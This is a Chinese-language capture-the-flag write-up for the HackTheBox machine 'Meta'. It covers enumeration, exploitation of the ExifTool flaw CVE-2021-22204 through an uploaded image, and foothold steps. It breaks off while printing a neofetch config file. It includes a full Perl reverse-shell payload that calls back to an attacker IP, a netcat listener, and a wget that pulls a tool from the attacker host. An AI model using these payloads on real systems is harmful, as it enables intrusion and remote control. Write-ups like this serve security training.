Meta-htb-writeup

0x00 靶场技能介绍

章节技能：子域名枚举、CVE-2021-22204、pspy工具使用、sh脚本分析、ImageMagick 7.0.10-36 漏洞、CVE-2020-29599、环境变量 XDG_CONFIG_HOME提权

参考链接：https://0xdf.gitlab.io/2022/06/11/htb-meta.html

参考链接：https://siunam321.github.io/ctf/hackthebox/Meta/

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.140

2、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p 22,80 -sCV 10.10.11.140       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-30 11:02 CST
Nmap scan report for 10.10.11.140
Host is up (0.40s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.09 seconds

3、在上面获取到了一个域名信息，那接下来扫描下VHOSTS虚拟子域名情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://10.10.11.140 -H "Host: FUZZ.artcorp.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.140
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.artcorp.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

dev01                   [Status: 200, Size: 247, Words: 16, Lines: 10, Duration: 349ms]
:: Progress: [4989/4989] :: Job [1/1] :: 29 req/sec :: Duration: [0:01:12] :: Errors: 1 ::

4、我们把获取到的域名都本地绑定下hosts

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.140 artcorp.htb dev01.artcorp.htb" | sudo tee -a /etc/hosts
10.10.11.140 artcorp.htb dev01.artcorp.htb

5、我们查看下80端口的首页内容吧

http://artcorp.htb/

6、接下来扫描下目录开放情况，但是并没有什么发现。

┌──(kali㉿offsec)-[~/Desktop]
└─$ feroxbuster -u http://artcorp.htb

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://artcorp.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        7l       20w      199c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        7l       23w      196c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        7l       20w      234c http://artcorp.htb/assets => http://artcorp.htb/assets/
301      GET        7l       20w      238c http://artcorp.htb/assets/img => http://artcorp.htb/assets/img/
[####################] - 7m     90006/90006   0s      found:2       errors:732    
[####################] - 6m     30000/30000   77/s    http://artcorp.htb/ 
[####################] - 6m     30000/30000   78/s    http://artcorp.htb/assets/ 
[####################] - 6m     30000/30000   82/s    http://artcorp.htb/assets/img/

7、那就看一下子域名情况

http://dev01.artcorp.htb/

8、那就扫描下目录情况吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ feroxbuster -u http://dev01.artcorp.htb -x php

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://dev01.artcorp.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        7l       20w      199c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        7l       23w      196c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        9l       24w      247c http://dev01.artcorp.htb/
301      GET        7l       20w      242c http://dev01.artcorp.htb/metaview => http://dev01.artcorp.htb/metaview/
301      GET        7l       20w      246c http://dev01.artcorp.htb/metaview/css => http://dev01.artcorp.htb/metaview/css/
200      GET        9l       24w      247c http://dev01.artcorp.htb/index.php
301      GET        7l       20w      249c http://dev01.artcorp.htb/metaview/assets => http://dev01.artcorp.htb/metaview/assets/
301      GET        7l       20w      246c http://dev01.artcorp.htb/metaview/lib => http://dev01.artcorp.htb/metaview/lib/
301      GET        7l       20w      250c http://dev01.artcorp.htb/metaview/uploads => http://dev01.artcorp.htb/metaview/uploads/
200      GET       33l       83w     1404c http://dev01.artcorp.htb/metaview/index.php
200      GET        0l        0w   155713c http://dev01.artcorp.htb/metaview/css/bootstrap.min.css
301      GET        7l       20w      249c http://dev01.artcorp.htb/metaview/vendor => http://dev01.artcorp.htb/metaview/vendor/

9、这里发现了一个目录，我们查看下这个目录情况

http://dev01.artcorp.htb/metaview/

10、看情况是上次图片进行分析的，我们上次个图片看下

http://dev01.artcorp.htb/metaview/index.php

11、我们发现了出现了一些信息，以往的经验来看，这个应该是使用了exiftool工具进行显示的信息，我们本地用呢个工具比对下看看

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool ./bg-showcase-2.jpg 
ExifTool Version Number         : 12.70
File Name                       : bg-showcase-2.jpg
Directory                       : .
File Size                       : 197 kB
File Modification Date/Time     : 2024:01:30 11:24:37+08:00
File Access Date/Time           : 2024:01:30 11:24:37+08:00
File Inode Change Date/Time     : 2024:01:30 11:24:37+08:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Little-endian (Intel, II)
Quality                         : 100%
XMP Toolkit                     : Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21
Document ID                     : xmp.did:391792B7C1AC11E79FC6E0171011BB04
Instance ID                     : xmp.iid:391792B6C1AC11E79FC6E0171011BB04
Creator Tool                    : Adobe Photoshop CC 2018 Macintosh
Derived From Instance ID        : 30005BFC1BB16784324B782F5C8D8E08
Derived From Document ID        : 30005BFC1BB16784324B782F5C8D8E08
DCT Encode Version              : 100
APP14 Flags 0                   : [14], Encoded with Blend=1 downsampling
APP14 Flags 1                   : (none)
Color Transform                 : YCbCr
Image Width                     : 900
Image Height                    : 600
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 900x600
Megapixels                      : 0.540

12、这里推测，应该是用的这个软件，我们看看这个软件有什么漏洞吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit exiftool               
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
ExifTool 12.23 - Arbitrary Code Execution                                            | linux/local/50911.py
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m linux/local/50911.py
  Exploit: ExifTool 12.23 - Arbitrary Code Execution
      URL: https://www.exploit-db.com/exploits/50911
     Path: /usr/share/exploitdb/exploits/linux/local/50911.py
    Codes: CVE-2021-22204
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/50911.py

13、但是默认的这个工具，生成脚本有些问题，我们在github上找了同类型的脚本，我们继续生成下exp

https://hackerone.com/reports/1154542

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

https://github.com/UNICORDev/exploit-CVE-2021-22204

┌──(kali㉿offsec)-[~/Desktop/exploit-CVE-2021-22204-main]
└─$ ls -la
总计 28
drwx------ 2 kali kali 4096 2022年 6月 8日 .
drwxr-xr-x 5 kali kali 4096  1月30日 11:46 ..
-rw-r--r-- 1 kali kali  481 2022年 6月 8日 Dockerfile
-rw-r--r-- 1 kali kali 6802 2022年 6月 8日 exploit-CVE-2021-22204.py
-rw-r--r-- 1 kali kali   85 2022年 6月 8日 .gitignore
-rw-r--r-- 1 kali kali 2725 2022年 6月 8日 README.md

┌──(kali㉿offsec)-[~/Desktop/exploit-CVE-2021-22204-main]
└─$ sudo python exploit-CVE-2021-22204.py -c 'id'

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
PAYLOAD: (metadata "\c${system('id')};")
DEPENDS: Dependencies for exploit are met!
PREPARE: Payload written to file!
PREPARE: Payload file compressed!
PREPARE: DjVu file created!
PREPARE: JPEG image created/processed!
PREPARE: Exiftool config written to file!
EXPLOIT: Payload injected into image!
CLEANUP: Old file artifacts deleted!
SUCCESS: Exploit image written to "image.jpg"

14、我们把这个exp上传下，看看是否有漏洞显示

http://dev01.artcorp.htb/metaview/index.php

uid=33(www-data) gid=33(www-data) groups=33(www-data)
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Y Cb Cr Positioning             : Centered
DjVu Version                    : 0.24

15、看来漏洞是存在的，那我们就构造一个反弹shell的exp吧

┌──(kali㉿offsec)-[~/Desktop/exploit-CVE-2021-22204-main]
└─$ sudo python exploit-CVE-2021-22204.py -s 10.10.14.4 443
[sudo] kali 的密码：

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Execution
PAYLOAD: (metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(443,inet_aton('10.10.14.4')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};")
DEPENDS: Dependencies for exploit are met!
PREPARE: Payload written to file!
PREPARE: Payload file compressed!
PREPARE: DjVu file created!
PREPARE: JPEG image created/processed!
PREPARE: Exiftool config written to file!
EXPLOIT: Payload injected into image!
CLEANUP: Old file artifacts deleted!
SUCCESS: Exploit image written to "image.jpg"

16、上传图片，获取下初始权限

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.140] 39632
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ 

17、设置下全交互式shell格式

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.140] 39634
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ script /dev/null -c bash
Script started, file is /dev/null
www-data@meta:/var/www/dev01.artcorp.htb/metaview$ ^Z
zsh: suspended  nc -lvnp 443
                                                                                                 
┌──(kali㉿offsec)-[~/Desktop]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 443
                              reset
reset: unknown terminal type unknown
Terminal type? screen

www-data@meta:/var/www/dev01.artcorp.htb/metaview$ 

18、看下用户根目录下，是什么用户，是否可以直接查看user.txt内容

www-data@meta:/var/www/dev01.artcorp.htb/metaview$ ls -la /home/
total 12
drwxr-xr-x  3 root   root   4096 Aug 29  2021 .
drwxr-xr-x 18 root   root   4096 Aug 29  2021 ..
drwxr-xr-x  4 thomas thomas 4096 Jan 17  2022 thomas
www-data@meta:/var/www/dev01.artcorp.htb/metaview$ ls -la /home/thomas/
total 32
drwxr-xr-x 4 thomas thomas 4096 Jan 17  2022 .
drwxr-xr-x 3 root   root   4096 Aug 29  2021 ..
lrwxrwxrwx 1 root   root      9 Aug 29  2021 .bash_history -> /dev/null
-rw-r--r-- 1 thomas thomas  220 Aug 29  2021 .bash_logout
-rw-r--r-- 1 thomas thomas 3526 Aug 29  2021 .bashrc
drwxr-xr-x 3 thomas thomas 4096 Aug 30  2021 .config
-rw-r--r-- 1 thomas thomas  807 Aug 29  2021 .profile
drwx------ 2 thomas thomas 4096 Jan  4  2022 .ssh
-rw-r----- 1 root   thomas   33 Jan 29 21:54 user.txt
www-data@meta:/var/www/dev01.artcorp.htb/metaview$ 

19、由于这里是中级靶机，查看网站配置啥的，都是容易靶机的套路，这里上pspy看看进程有啥疑似问题没把

www-data@meta:/var/www/dev01.artcorp.htb/metaview$ cd /tmp
www-data@meta:/tmp$ ls
www-data@meta:/tmp$
www-data@meta:/tmp$ uname -a
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
www-data@meta:/tmp$ 

┌──(kali㉿offsec)-[~/Desktop/tools/pspy]
└─$ python3 -m http.server 80               
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.140 - - [30/Jan/2024 14:14:25] "GET /pspy64 HTTP/1.1" 200 -

www-data@meta:/tmp$ wget http://10.10.14.4/pspy64
--2024-01-30 01:14:24--  http://10.10.14.4/pspy64
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64'

pspy64              100%[===================>]   2.96M   617KB/s    in 5.7s    

2024-01-30 01:14:30 (533 KB/s) - 'pspy64' saved [3104768/3104768]

www-data@meta:/tmp$ ls
pspy64

20、接下来就是运行下，查看下进程情况吧

www-data@meta:/tmp$ chmod +x pspy64 
www-data@meta:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2024/01/30 01:15:27 CMD: UID=33    PID=4158   | ./pspy64 
2024/01/30 01:15:27 CMD: UID=0     PID=4066   | 
2024/01/30 01:15:27 CMD: UID=33    PID=3965   | bash 
2024/01/30 01:15:27 CMD: UID=33    PID=3964   | sh -c bash 
2024/01/30 01:15:27 CMD: UID=33    PID=3963   | script /dev/null -c bash 
2024/01/30 01:15:27 CMD: UID=33    PID=3961   | /bin/sh -i 
2024/01/30 01:15:27 CMD: UID=33    PID=3960   | sh -c exiftool '/var/www/dev01.artcorp.htb/metaview/uploads/phphA3LxI.jpg' --system:all --exiftool:all -e                                         
2024/01/30 01:15:27 CMD: UID=0     PID=3672   | 
2024/01/30 01:15:27 CMD: UID=0     PID=3163   | 
2024/01/30 01:15:27 CMD: UID=33    PID=2235   | /bin/bash 
2024/01/30 01:15:27 CMD: UID=33    PID=2234   | python3 -c import pty; pty.spawn("/bin/bash") 
2024/01/30 01:15:27 CMD: UID=33    PID=2224   | /bin/sh -i 
2024/01/30 01:15:27 CMD: UID=33    PID=2223   | sh -c exiftool '/var/www/dev01.artcorp.htb/metaview/uploads/php4CuAkX.jpg' --system:all --exiftool:all -e                                         
2024/01/30 01:15:27 CMD: UID=33    PID=1746   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=33    PID=1716   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=33    PID=1715   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=33    PID=1707   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=33    PID=1692   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=33    PID=1571   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=33    PID=1539   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=33    PID=1469   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=33    PID=1466   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=33    PID=1254   | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=0     PID=622    | /usr/sbin/apache2 -k start 
2024/01/30 01:15:27 CMD: UID=0     PID=613    | /usr/sbin/sshd -D 
2024/01/30 01:15:27 CMD: UID=0     PID=603    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2024/01/30 01:15:27 CMD: UID=0     PID=430    | /lib/systemd/systemd-logind 
2024/01/30 01:15:27 CMD: UID=0     PID=429    | 
2024/01/30 01:15:27 CMD: UID=0     PID=426    | /usr/sbin/rsyslogd -n -iNONE 
2024/01/30 01:15:27 CMD: UID=104   PID=424    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                          
2024/01/30 01:15:27 CMD: UID=0     PID=419    | /usr/sbin/cron -f 
2024/01/30 01:15:27 CMD: UID=0     PID=412    | /usr/bin/vmtoolsd 
2024/01/30 01:15:27 CMD: UID=0     PID=403    | 
2024/01/30 01:15:27 CMD: UID=0     PID=402    | 
2024/01/30 01:15:27 CMD: UID=101   PID=392    | /lib/systemd/systemd-timesyncd 
2024/01/30 01:15:27 CMD: UID=0     PID=391    | /usr/bin/VGAuthService 
2024/01/30 01:15:27 CMD: UID=0     PID=364    | /lib/systemd/systemd-udevd 
2024/01/30 01:15:27 CMD: UID=0     PID=362    | 
2024/01/30 01:15:27 CMD: UID=0     PID=347    | /lib/systemd/systemd-journald 
2024/01/30 01:15:27 CMD: UID=0     PID=313    | 
2024/01/30 01:15:27 CMD: UID=0     PID=1      | /sbin/init 
2024/01/30 01:15:27 CMD: UID=0     PID=4166   | 
2024/01/30 01:16:01 CMD: UID=0     PID=4169   | /usr/sbin/CRON -f 
2024/01/30 01:16:01 CMD: UID=0     PID=4168   | /usr/sbin/cron -f 
2024/01/30 01:16:01 CMD: UID=0     PID=4167   | /usr/sbin/CRON -f 
2024/01/30 01:16:02 CMD: UID=0     PID=4170   | /usr/sbin/CRON -f 
2024/01/30 01:16:02 CMD: UID=0     PID=4171   | /usr/sbin/CRON -f 
2024/01/30 01:16:02 CMD: UID=0     PID=4172   | /bin/sh -c rm /tmp/* 
2024/01/30 01:16:02 CMD: UID=0     PID=4174   | /usr/sbin/CRON -f 
2024/01/30 01:16:02 CMD: UID=0     PID=4173   | cp -rp /root/conf/config_neofetch.conf /home/thomas/.config/neofetch/config.conf                                                                  
2024/01/30 01:16:02 CMD: UID=1000  PID=4175   | /bin/bash /usr/local/bin/convert_images.sh 
2024/01/30 01:16:02 CMD: UID=1000  PID=4176   | /bin/bash /usr/local/bin/convert_images.sh 
2024/01/30 01:16:02 CMD: UID=1000  PID=4177   | /bin/bash /usr/local/bin/convert_images.sh 
2024/01/30 01:17:01 CMD: UID=0     PID=4180   | /usr/sbin/CRON -f 
2024/01/30 01:17:01 CMD: UID=0     PID=4179   | /usr/sbin/CRON -f 
2024/01/30 01:17:01 CMD: UID=0     PID=4178   | /usr/sbin/cron -f 
2024/01/30 01:17:01 CMD: UID=0     PID=4182   | /usr/sbin/CRON -f 
2024/01/30 01:17:01 CMD: UID=1000  PID=4183   | /bin/sh -c /usr/local/bin/convert_images.sh 
2024/01/30 01:17:01 CMD: UID=0     PID=4184   | /usr/sbin/CRON -f 
2024/01/30 01:17:01 CMD: UID=0     PID=4185   | /usr/sbin/CRON -f 
2024/01/30 01:17:01 CMD: UID=1000  PID=4186   | /bin/bash /usr/local/bin/convert_images.sh 
2024/01/30 01:17:01 CMD: UID=0     PID=4188   | /bin/sh -c rm /tmp/* 
2024/01/30 01:17:01 CMD: UID=1000  PID=4187   | pkill mogrify 
2024/01/30 01:17:01 CMD: UID=0     PID=4189   | /bin/sh -c    cd / && run-parts --report /etc/cron.hourly    

21、这里发现了几个脚本信息和配置信息，那就查看下吧

www-data@meta:/tmp$ 
www-data@meta:/tmp$ ls -la /usr/local/bin/convert_images.sh
-rwxr-xr-x 1 root root 126 Jan  3  2022 /usr/local/bin/convert_images.sh
www-data@meta:/tmp$ ls -la /home/thomas/.config/neofetch/config.conf
-rw-r--r-- 1 thomas thomas 14591 Aug 30  2021 /home/thomas/.config/neofetch/config.conf
www-data@meta:/tmp$ 

www-data@meta:/tmp$ cat /home/thomas/.config/neofetch/config.conf
# See this wiki page for more info:
# https://github.com/dylanaraps/neofetch/wiki/Customizing-Info
print_info() {
    info title
    info underline

    info "OS" distro
    info "Host" model
    info "Kernel" kernel
    info "Uptime" uptime
    info "Packages" packages
    info "Shell" shell
    info "Resolution" resolution
    info "DE" de
    info "WM" wm
    info "WM Theme" wm_theme
    info "Theme" theme
    info "Icons" icons
    info "Terminal" term
    info "Terminal Font" term_font
    info "CPU" cpu
    info "GPU" gpu
    info "Memory" memory

    # info "GPU Driver" gpu_driver  # Linux/macOS only
    # info "CPU Usage" cpu_usage
    # info "Disk" disk
    # info "Battery" battery
    # info "Font" font
    # info "Song" song
    # [[ $player ]] && prin "Music Player" "$player"
    # info "Local IP" local_ip
    # info "Public IP" public_ip
    # info "Users" users
    # info "Locale" locale  # This only works on glibc systems.

    info cols
}


# Kernel


# Shorten the output of the kernel function.
#
# Default:  'on'
# Values:   'on', 'off'
# Flag:     --kernel_shorthand
# Supports: Everything except *BSDs (except PacBSD and PC-BSD)
#
# Example:
# on:  '4.8.9-1-ARCH'
# off: 'Linux 4.8.9-1-ARCH'
kernel_shorthand="on"


# Distro


# Shorten the output of the distro function
#
# Default:  'off'
# Values:   'on', 'off', 'tiny'
# Flag:     --distro_shorthand
# Supports: Everything except Windows and Haiku
distro_shorthand="off"

# Show/Hide OS Architecture.
# Show 'x86_64', 'x86' and etc in 'Distro:' output.
#
# Default: 'on'
# Values:  'on', 'off'
# Flag:    --os_arch
#
# Example:
# on:  'Arch Linux x86_64'
# off: 'Arch Linux'
os_arch="on"


# Uptime


# Shorten the output of the uptime function
#
# Default: 'on'
# Values:  'on', 'off', 'tiny'
# Flag:    --uptime_shorthand
#
# Example:
# on:   '2 days, 10 hours, 3 mins'
# off:  '2 days, 10 hours, 3 minutes'
# tiny: '2d 10h 3m'
uptime_shorthand="on"


# Memory


# Show memory pecentage in output.
#
# Default: 'off'
# Values:  'on', 'off'
# Flag:    --memory_percent
#
# Example:
# on:   '1801MiB / 7881MiB (22%)'
# off:  '1801MiB / 7881MiB'
memory_percent="off"


# Packages


# Show/Hide Package Manager names.
#
# Default: 'tiny'
# Values:  'on', 'tiny' 'off'
# Flag:    --package_managers
#
# Example:
# on:   '998 (pacman), 8 (flatpak), 4 (snap)'
# tiny: '908 (pacman, flatpak, snap)'
# off:  '908'
package_managers="on"


# Shell


# Show the path to $SHELL
#
# Default: 'off'
# Values:  'on', 'off'
# Flag:    --shell_path
#
# Example:
# on:  '/bin/bash'
# off: 'bash'
shell_path="off"

# Show $SHELL version
#
# Default: 'on'
# Values:  'on', 'off'
# Flag:    --shell_version
#
# Example:
# on:  'bash 4.4.5'
# off: 'bash'
shell_version="on"


# CPU


# CPU speed type
#
# Default: 'bios_limit'
# Values: 'scaling_cur_freq', 'scaling_min_freq', 'scaling_max_freq', 'bios_limit'.
# Flag:    --speed_type
# Supports: Linux with 'cpufreq'
# NOTE: Any file in '/sys/devices/system/cpu/cpu0/cpufreq' can be used as a value.
speed_type="bios_limit"

# CPU speed shorthand
#
# Default: 'off'
# Values: 'on', 'off'.
# Flag:    --speed_shorthand
# NOTE: This flag is not supported in systems with CPU speed less than 1 GHz
#
# Example:
# on:    'i7-6500U (4) @ 3.1GHz'
# off:   'i7-6500U (4) @ 3.100GHz'
speed_shorthand="off"

# Enable/Disable CPU brand in output.
#
# Default: 'on'
# Values:  'on', 'off'
# Flag:    --cpu_brand
#
# Example:
# on:   'Intel i7-6500U'
# off:  'i7-6500U (4)'
cpu_brand="on"

# CPU Speed
# Hide/Show CPU speed.
#
# Default: 'on'
# Values:  'on', 'off'
# Flag:    --cpu_speed
#
# Example:
# on:  'Intel i7-6500U (4) @ 3.1GHz'
# off: 'Intel i7-6500U (4)'
cpu_speed="on"

# CPU Cores
# Display CPU cores in output
#
# Default: 'logical'
# Values:  'logical', 'physical', 'off'
# Flag:    --cpu_cores
# Support: 'physical' doesn't work on BSD.
#
# Example:
# logical:  'Intel i7-6500U (4) @ 3.1GHz' (All virtual cores)
# physical: 'Intel i7-6500U (2) @ 3.1GHz' (All physical cores)
# off:      'Intel i7-6500U @ 3.1GHz'
cpu_cores="logical"

# CPU Temperature
# Hide/Show CPU temperature.
# Note the temperature is added to the regular CPU function.
#
# Default: 'off'
# Values:  'C', 'F', 'off'
# Flag:    --cpu_temp
# Supports: Linux, BSD
# NOTE: For FreeBSD and NetBSD-based systems, you'll need to enable
#       coretemp kernel module. This only supports newer Intel processors.
#
# Example:
# C:   'Intel i7-6500U (4) @ 3.1GHz [27.2°C]'
# F:   'Intel i7-6500U (4) @ 3.1GHz [82.0°F]'
# off: 'Intel i7-6500U (4) @ 3.1GHz'
cpu_temp="off"


# GPU


# Enable/Disable GPU Brand
#
# Default: 'on'
# Values:  'on', 'off'
# Flag:    --gpu_brand
#
# Example:
# on:  'AMD HD 7950'
# off: 'HD 7950'
gpu_brand="on"

# Which GPU to display
#
# Default: 'all'
# Values:  'all', 'dedicated', 'integrated'
# Flag:    --gpu_type
# Supports: Linux
#
# Example:
# all:
#   GPU1: AMD HD 7950
#   GPU2: Intel Integrated Graphics
#
# dedicated:
#   GPU1: AMD HD 7950
#
# integrated:
#   GPU1: Intel Integrated Graphics
gpu_type="all"


# Resolution


# Display refresh rate next to each monitor
# Default: 'off'
# Values:  'on', 'off'
# Flag:    --refresh_rate
# Supports: Doesn't work on Windows.
#
# Example:
# on:  '1920x1080 @ 60Hz'
# off: '1920x1080'
refresh_rate="off"


# Gtk Theme / Icons / Font


# Shorten output of GTK Theme / Icons / Font
#
# Default: 'off'
# Values:  'on', 'off'
# Flag:    --gtk_shorthand
#
# Example:
# on:  'Numix, Adwaita'
# off: 'Numix [GTK2], Adwaita [GTK3]'
gtk_shorthand="off"


# Enable/Disable gtk2 Theme / Icons / Font
#
# Default: 'on'
# Values:  'on', 'off'
# Flag:    --gtk2
#
# Example:
# on:  'Numix [GTK2], Adwaita [GTK3]'
# off: 'Adwaita [GTK3]'
gtk2="on"

# Enable/Disable gtk3 Theme / Icons / Font
#
# Default: 'on'
# Values:  'on', 'off'
# Flag:    --gtk3
#
# Example:
# on:  'Numix [GTK2], Adwaita [GTK3]'
# off: 'Numix [GTK2]'
gtk3="on"


# IP Address


# Website to ping for the public IP
#
# Default: 'http://ident.me'
# Values:  'url'
# Flag:    --ip_host
public_ip_host="http://ident.me"

# Public IP timeout.
#
# Default: '2'
# Values:  'int'
# Flag:    --ip_timeout
public_ip_timeout=2


# Disk


# Which disks to display.
# The values can be any /dev/sdXX, mount point or directory.
# NOTE: By default we only show the disk info for '/'.
#
# Default: '/'
